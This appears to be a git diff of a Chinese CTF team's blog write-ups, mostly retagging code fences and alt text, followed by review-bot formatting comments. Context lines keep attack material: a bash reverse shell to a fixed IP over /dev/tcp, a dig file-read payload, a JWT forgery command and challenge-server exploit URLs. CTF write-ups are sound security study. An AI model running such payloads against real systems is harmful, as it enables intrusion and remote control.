diff --git a/source/_posts/2024-AliyunCTF.md b/source/_posts/2024-AliyunCTF.md index 4f2d14b..2a74f6c 100644 --- a/source/_posts/2024-AliyunCTF.md +++ b/source/_posts/2024-AliyunCTF.md @@ -294,7 +294,7 @@ string s1, string s2, string s3, string s4, string s5, string s6 -> int { ## BadApple -```Python +```javascript let abuf = new ArrayBuffer(0x10); let bbuf = new BigUint64Array(abuf); let fbuf = new Float64Array(abuf); @@ -735,7 +735,7 @@ if __name__ == '__main__': main() ``` -![img](../images/2024-AliyunCTF/20240325204801605.webp) +![](../images/2024-AliyunCTF/20240325204801605.webp) ## BabyDH2 @@ -1204,7 +1204,7 @@ if __name__ == '__main__': g.gao() ``` -![img](../images/2024-AliyunCTF/20240325204801682.webp) +![](../images/2024-AliyunCTF/20240325204801682.webp) # Web @@ -1218,7 +1218,7 @@ https://gtfobins.github.io/gtfobins/dig/ {"domain":"l1nyz-tel.cc","type":"-f/flag"} ``` -![img](../images/2024-AliyunCTF/20240325204801511.webp) +![](../images/2024-AliyunCTF/20240325204801511.webp) ## chain17 @@ -1401,11 +1401,11 @@ dfs(start) 010打开发现文件中只有UTF-8字符,没有其他数据;一眼盯出,同时存在长得很像的“文”字和类似字 -![img](../images/2024-AliyunCTF/20240325204801578.webp) +![](../images/2024-AliyunCTF/20240325204801578.webp) 换用兼容性不强的艺术字体(图中是字体圈欣意冠黑体)把这些字凸显出来,在Unicode表中检索,可以知道它们都是[康熙部首](https://zhuanlan.zhihu.com/p/352872903):`assert all([0x2f00 <= ord(c) <= 0x2fdf for c in '⽂⾼⾦⾄⽣⽇⽌⽤⾔⽅⾧⾯⾹⾮⾃⼈⼯⼀⼗⼥⾳⽽⽬⼤⼆⼲⼿⽃⾖⼜⾻⼐⼩⾊⽰⽕⾍⽅⿎⽴⼊⾏⽉⽇'])` -![img](../images/2024-AliyunCTF/20240325204801469.webp) +![](../images/2024-AliyunCTF/20240325204801469.webp) 原文有意义,不太可能是取这种字的字码,也不太可能是两个这种字之间的距离,因为有意义的原文不是这么好构造的。可以尝试把康熙部首和对应的正常字分别变成1和0 @@ -1655,7 +1655,7 @@ print(char) 得到332bits,给0和1分别上色,发现如果每14位分为一组,刚好最高位都是0,且存在相同的几行 -![img](../images/2024-AliyunCTF/20240325204801445.webp) +![](../images/2024-AliyunCTF/20240325204801445.webp) 猜测14位编码一个汉字,尝试按区位码处理 diff --git a/source/_posts/2024-D3CTF.md b/source/_posts/2024-D3CTF.md index 3880e49..36f0d7e 100644 --- a/source/_posts/2024-D3CTF.md +++ b/source/_posts/2024-D3CTF.md 
@@ -15,7 +15,7 @@ mathjax: true ## 1.1 PwnShell -```C +```php & /dev/tcp/8.129.42.140/3307 0>&1" 打包,注意z参数 -```C++ +```bash tar czf 1.tar sandbox .sandbox-module ``` @@ -791,7 +791,7 @@ Github 上给的 example 中分母就是一个 solve,猜测这里的分母和 代入两个式子后 Coppersmith 或者 gcd 两种方法都能求出 x, y -```Plain +```python x,y=(2150041731351815713171104523921920493220624053206985451744233895108303740469684723305396314365408654901185731316940674743393624005747389336974965252847296612520628261079495101318288878763133399451251, 226424529213344999668721893182041940135510332166374912207004824461410074124256560817809951006519763202279310112144759780123971358841835703176196881303793274922977845173880043211792854018584878197697797884263497201497403074557926911586759787949296373546575946325913789515250) from Crypto.Util.number import * @@ -903,7 +903,7 @@ print(L) 爆 -```Python +```c++ #include using namespace std; @@ -1026,6 +1026,9 @@ int main(int argc, char const *argv[]) } // g++ multi.cpp -O3 -lpthread -o multi +``` + +```python import random secret_KEY = 886 from task_utils import * @@ -1091,24 +1094,9 @@ class Gao: if __name__ == '__main__': g = Gao() g.test_get_flag() -from PIL import Image -from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes - -width, height = 72, 60 +``` -tap_list = [[0, 0, 0, 0], - [0, 0, 0, 0], - [0, 0, 0, 0], - [0, 0, 0, 0]] -chunk_size = 16 -iv = '00000000000000000000000000000000' -iv = bytes.fromhex(iv) -enc = ImageEncryption(tap_list=tap_list, iv=iv) -img_c = Image.open('enc_from_server.png') -img_cb = image_to_bytes(img_c) -img_mb = enc.decryption(img_cb) -img_m = bytes_to_image(img_mb, width, height) -img_m.save('dec.png') +```python from PIL import Image from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes @@ -1129,7 +1117,7 @@ img_m = bytes_to_image(img_mb, width, height) img_m.save('dec.png') ``` -![img](../images/2024-D3CTF/image2.webp) +![](../images/2024-D3CTF/image2.webp) ## 3.5 enctwice 
@@ -1296,7 +1284,7 @@ if __name__ == '__main__': 用伪随机数来决定虚拟机流程的虚拟机。首先打开ida的trace function可以dump出整个大概的执行流程,提取出函数的偏移,然后用idapython脚本可以提取大概的真正有用的汇编指令 -```C++ +```python from idaapi import * from idc import * from ida_bytes import * @@ -1332,7 +1320,7 @@ open(r"C:\Users\xman\Downloads\RandomVM\log.txt").write(final) 随后就是在每个xor和shl下断点 -```C++ +```python def rotate_left(num, shift): if shift >= 8: return 0 @@ -1472,7 +1460,7 @@ f.write(f"{num:#x} >> {al} = {(num>>al)&0xffffffffff:#x}\n") 输入0123456789ABCDEFGHIJKLMNOPQRSTUVWXY得到trace: -```Plain +```c 0x2324252627 << 4 = 0x3242526270 0x2324252627 >> 5 = 0x119212931 0x3242526270 ^ 0x119212931 = 0x335b734b41 @@ -1540,15 +1528,15 @@ D3CTF(TECH-EV0LVE,EMBR@C3-PR0GR3SS) 爆破到 d3ctf{0ut??????????????} 不给爆了 乐 -![img](../images/2024-D3CTF/image3.webp) +![](../images/2024-D3CTF/image3.webp) 18496 = 64 * 17 * 17, 每64byte一组,迷宫一共17*17大,win的条件是触发c000005,需要跑出去迷宫 -![img](../images/2024-D3CTF/image4.webp) +![](../images/2024-D3CTF/image4.webp) SEH里边根据当前位置的两个常量计算返回地址,num 1,2就是下图data里的两个常量,所以走迷宫,从MSB开始根据每一位是0还是1决定用上边两个还是下边两个计算下一次跳转的位置 -![img](../images/2024-D3CTF/image5.webp) +![](../images/2024-D3CTF/image5.webp) 想走出去最后一次应该计算出一个比较大的值,那从0x406030+18496每64byte切片,然后从FF开始反向搜索,上图每两个cli对应一个flag bit上边是0下边是1,每两个cli里常量上边是*1的下边是*17的 @@ -1605,7 +1593,7 @@ for a in range(33, 127): f.close() ``` -![img](../images/2024-D3CTF/image6.webp) +![](../images/2024-D3CTF/image6.webp) ## 4.4 ezjunk @@ -1621,7 +1609,7 @@ fakeflag和flag在tea上无区别 **crc校验:** -![img](../images/2024-D3CTF/image7.webp) +![](../images/2024-D3CTF/image7.webp) exp: @@ -1735,7 +1723,7 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc= 附件里有一个 OpenVPN 配置,但是缺少了 TLS key 部份。然后题目说缺失的部份在前往 `2a13:b487:11aa::d3:c7f:2f` 的路径上。所以就 mtr 一下,得到: -![img](../images/2024-D3CTF/image8.webp) +![](../images/2024-D3CTF/image8.webp) 按顺序拼起来就是 TLS key,而且长度刚好是整数。有了完整配置之后,就能通过 OpenVPN 连上实例。 
@@ -1751,4 +1739,4 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc= 在activity里有flag -![img](../images/2024-D3CTF/image9.webp) \ No newline at end of file +![](../images/2024-D3CTF/image9.webp) \ No newline at end of file diff --git a/source/_posts/2024-DubheCTF.md b/source/_posts/2024-DubheCTF.md index a72a48e..2483083 100644 --- a/source/_posts/2024-DubheCTF.md +++ b/source/_posts/2024-DubheCTF.md @@ -18,9 +18,9 @@ toc: true 根据提示开始脑洞,githack dump 源码 -![img](../images/2024-DubheCTF/20240319010444813.webp) +![](../images/2024-DubheCTF/20240319010444813.webp) -![img](../images/2024-DubheCTF/20240319010444894.webp) +![](../images/2024-DubheCTF/20240319010444894.webp) 通过 `range: bytes={start}-{end}` 来读取 mem 中的密钥,伪造成 admin 上传 pt 文件,之后 torch load 的时候触发 pickle 反序列化。 @@ -156,7 +156,7 @@ if __name__ == '__main__': Pickle 反序列化的时候,exec 执行一段 python 代码,新建一个 `@app.post("/")` 路由(相当于内存马? -![img](../images/2024-DubheCTF/20240319010444749.webp) +![](../images/2024-DubheCTF/20240319010444749.webp) 将 bot 发送的东西都写到一个文件里,弹 shell 进去 cat 看看即可 @@ -297,7 +297,7 @@ http://1.95.13.243:49319/getlocal?path=/app/pref.yml 同时看到没有打开 cache 功能 -![img](../images/2024-DubheCTF/20240319010444775.webp) +![](../images/2024-DubheCTF/20240319010444775.webp) 需要找另一个文件写入点 @@ -322,7 +322,7 @@ function parse(x) { http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103782304169366230 -![img](../images/2024-DubheCTF/20240319010444751.webp) +![](../images/2024-DubheCTF/20240319010444751.webp) ## Javolution @@ -330,7 +330,7 @@ http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103 http://1.95.54.152:34473/pal/cheat?hp=-1000000000&attack=-1000000000&defense=-1000000000 -![img](../images/2024-DubheCTF/20240319010444758.webp) +![](../images/2024-DubheCTF/20240319010444758.webp) 然后 level 变 50 
@@ -350,7 +350,7 @@ Jdk 17 反序列化 --add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED ``` -![img](../images/2024-DubheCTF/20240319010444936.webp) +![](../images/2024-DubheCTF/20240319010444936.webp) ```Java import com.fasterxml.jackson.databind.node.POJONode; @@ -720,7 +720,7 @@ for t in range(0, 257): pass ``` -![img](../images/2024-DubheCTF/20240319010444891.webp) +![](../images/2024-DubheCTF/20240319010444891.webp) 你永远可以相信可靠的J神逆出来的代码不会有任何问题 @@ -921,7 +921,7 @@ sh.interactive() print(open('/flag').read()) ``` -![img](../images/2024-DubheCTF/20240319010444993.webp) +![](../images/2024-DubheCTF/20240319010444993.webp) ``` DubheCTF{l3HC7F_h45_4_8e77ER_Ch4lLEngE!} @@ -999,7 +999,7 @@ alt-svc: h3=":443"; ma=86400 搭好这个隧道之后,就可以用 https://devtools.devprod.cloudflare.dev 连接这个 inspect 端口对 wrangler 项目进行调试。不过断点貌似不是很好下,不过可以在 Memory 里直接把整个 heap snapshot 导出,导出之后搜索一下 flag 就可以了。 -![img](../images/2024-DubheCTF/20240319010444931.webp) +![](../images/2024-DubheCTF/20240319010444931.webp) ## no more taowa @@ -1504,7 +1504,7 @@ if __name__ == '__main__': # print(png_judge_type('./lsb_msb_test/' + f)) ``` -![img](../images/2024-DubheCTF/20240319010445007.webp) +![](../images/2024-DubheCTF/20240319010445007.webp) ``` DubheCTF{j00_H4V3_m4573r3d_m47Ry05HK4_d0Ll2!} diff --git a/source/_posts/2024-ProvinceCTF.md b/source/_posts/2024-ProvinceCTF.md index 8985cc9..76a0e3e 100644 --- a/source/_posts/2024-ProvinceCTF.md +++ b/source/_posts/2024-ProvinceCTF.md @@ -36,7 +36,7 @@ Access Denied 用 X-Forwarded-For 伪造成 127.0.0.1 进行绕过 这个 file 的传参什么都没说,要自己测,应该是要求以 `php://` 开头,而且限制了长度 -![img](../images/2024-ProvinceCTF/image1.webp) +![](../images/2024-ProvinceCTF/image1.webp) ### Hackme(套娃缝合怪) 
@@ -53,7 +53,7 @@ docker run -it sig2n /bin/bash root@201317bd1ea9:/app python3 jwt_forgery.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7LTCfIb4x6M6RRhotbersK1AGKKGUyVHmr0es0bHpw eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCIsImlwIjoiMTcyLjIwLjI0MC4zMiJ9.A9CrtyzLavHQif9VRIHJN1kSjLefzcKPArv3Eo96EbSlD5gzRU78QGiFkdtW_YxQgYc7z82PqH1BQGWMf5CLBfYSQNB6V9HV7FyZJUpzZt2b-irXitYFhW2qQJr0i_yrJA ``` -![img](../images/2024-ProvinceCTF/image2.webp) +![](../images/2024-ProvinceCTF/image2.webp) 得到4个公钥文件 @@ -143,7 +143,7 @@ echo "Encode:\n" . print_r($jwt, true) . "\n"; 校验成功 -![img](../images/2024-ProvinceCTF/image3.webp) +![](../images/2024-ProvinceCTF/image3.webp) 第二层有个文件上传接口,一个getfile.php的文件下载接口 @@ -151,13 +151,13 @@ echo "Encode:\n" . print_r($jwt, true) . "\n"; 无法访问上传的文件,猜测oss和题目是一台服务器,访问本地的8000端口 -![img](../images/2024-ProvinceCTF/image4.webp) +![](../images/2024-ProvinceCTF/image4.webp) xml数据错误,文件路径正确会显示download error => xxe,xxe禁止了system字符 => iconv编码绕过 -![img](../images/2024-ProvinceCTF/image5.webp) +![](../images/2024-ProvinceCTF/image5.webp) -![img](../images/2024-ProvinceCTF/image6.webp) +![](../images/2024-ProvinceCTF/image6.webp) ### unserialize_web(原题) @@ -191,7 +191,7 @@ www.zip 下载到源码 题目环境不出网,但是题目中对 tcpdf 的代码做了一点小修改,让其可以直接打 gopher ssrf -![img](../images/2024-ProvinceCTF/image7.webp) +![](../images/2024-ProvinceCTF/image7.webp) payload @@ -227,7 +227,7 @@ p.interactive() ### re1(无法验证flag正确性) -![img](../images/2024-ProvinceCTF/image8.webp) +![](../images/2024-ProvinceCTF/image8.webp) 脑洞,main往上有一段deadcode是xxtea,delta改0xA4EE8C0其他不变 (可能因为n=2时y和z刚好重复了) 
@@ -461,7 +461,7 @@ cmd.exe /c start "wt.exe" -w 0 nt -d . wsl.exe -d Ubuntu-22.04 bash -c "./brute cmd.exe /c start "wt.exe" -w 0 nt -d . wsl.exe -d Ubuntu-22.04 bash -c "./brute 240" ``` -![img](../images/2024-ProvinceCTF/image10.webp) +![](../images/2024-ProvinceCTF/image10.webp) ## Misc @@ -477,9 +477,9 @@ cmd.exe /c start "wt.exe" -w 0 nt -d . wsl.exe -d Ubuntu-22.04 bash -c "./brute ### 你要的就在这 -![img](../images/2024-ProvinceCTF/image11.webp) +![](../images/2024-ProvinceCTF/image11.webp) -![img](../images/2024-ProvinceCTF/image12.webp) +![](../images/2024-ProvinceCTF/image12.webp) 取前六位为密钥 @@ -499,7 +499,7 @@ stegpy xxx.png -p 然后把对称算法都脑洞一遍(RC系列 AES系列 DES系列...) -![img](../images/2024-ProvinceCTF/image13.webp) +![](../images/2024-ProvinceCTF/image13.webp) ## Crypto diff --git a/source/_posts/index.md b/source/_posts/index.md index a12f231..1648592 100644 --- a/source/_posts/index.md +++ b/source/_posts/index.md @@ -10,9 +10,9 @@ sticky: 1
2024 -- D3CTF 2024 第二名 +- D^3CTF 2024 第二名 -- AliyunCTF 2024 第五名 +- 阿里云 CTF 2024 第五名 - XCTF 联赛 DubheCTF 2024 第五名
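Review bot: every `![img](...)` to `![](...)` hunk across the five posts (for example `-![img](../images/2024-D3CTF/image8.webp)` / `+![](../images/2024-D3CTF/image8.webp)`) replaces a useless alt text with an empty one rather than a useful one, so screen readers and broken-image fallbacks still get nothing. Since each of these lines is already being touched, a short descriptive alt drawn from the surrounding text would be the better change, e.g. `![mtr output](../images/2024-D3CTF/image8.webp)` for the screenshot that the OpenVPN write-up introduces with "所以就 mtr 一下".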
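Review bot: in the `@@ -1472,7 +1460,7 @@` hunk of 2024-D3CTF.md the retag `+```c` is misleading, because the block is trace output (`0x2324252627 << 4 = 0x3242526270`, `0x3242526270 ^ 0x119212931 = 0x335b734b41`), not C source; `text` (or an untagged fence) avoids C highlighting of the `<<`, `>>` and `^` lines. The other `Plain` retag in this file (`@@ -791,7 +791,7 @@`) is fine, since its visible content (`x,y=(...)`, `from Crypto.Util.number import *`) really is Python.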
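Review bot: the `@@ -903,7 +903,7 @@` hunk of 2024-D3CTF.md retags the block as `c++` but leaves the visible `#include` line with no header name (the angle-bracket target was presumably eaten when the markdown was rendered as HTML); restore the include target while editing this fence, otherwise the `g++ multi.cpp -O3 -lpthread -o multi` command shown in the following hunk will not compile the block as pasted.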
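Review bot: in the `@@ -15,7 +15,7 @@` hunk of 2024-D3CTF.md the only context visible after the new `php` fence is `& /dev/tcp/8.129.42.140/3307 0>&1"`, which is a bash reverse-shell redirection; confirm that the block actually contains PHP wrapping that command (then `php` is the right tag), otherwise `bash` is the accurate choice, as used in the `tar czf 1.tar sandbox .sandbox-module` hunk just below.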
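Review bot: after the `@@ -1091,24 +1094,9 @@` hunk in 2024-D3CTF.md removes the duplicated PIL decryption block, only `from PIL import Image` and `from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes` of the kept copy remain visible; verify that the kept copy still defines `width, height`, `tap_list`, `chunk_size` and `iv = bytes.fromhex(iv)` before the `ImageEncryption(tap_list=tap_list, iv=iv)` call, since the removed lines were the ones carrying those definitions and the script will not run without them.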
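Review bot: the `@@ -350,7 +350,7 @@` hunk of 2024-DubheCTF.md leaves the adjacent context line `--add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED` with stray double backticks inside a fenced block; readers will copy that JVM flag verbatim, so cleaning it to `--add-opens java.xml/com.sun.org.apache.xpath.internal.objects=ALL-UNNAMED` in the same commit would avoid shipping a broken command.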
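Review bot: the index.md hunk renames the entries to `D^3CTF 2024` and `阿里云 CTF 2024` while the third entry keeps the English `DubheCTF`, and the post files and image paths still use `2024-D3CTF` and `2024-AliyunCTF`; keeping the slugs is right for stable URLs, but check that the post titles use the same spelling as the index, and check how the site's markdown renderer treats the bare `^` in `D^3CTF` (some Hexo renderers enable `^sup^` syntax). Separately, the `@@ -1751,4 +1739,4 @@` hunk in 2024-D3CTF.md rewrites the last line but keeps `\ No newline at end of file` on both sides; adding the trailing newline there would keep future diffs clean.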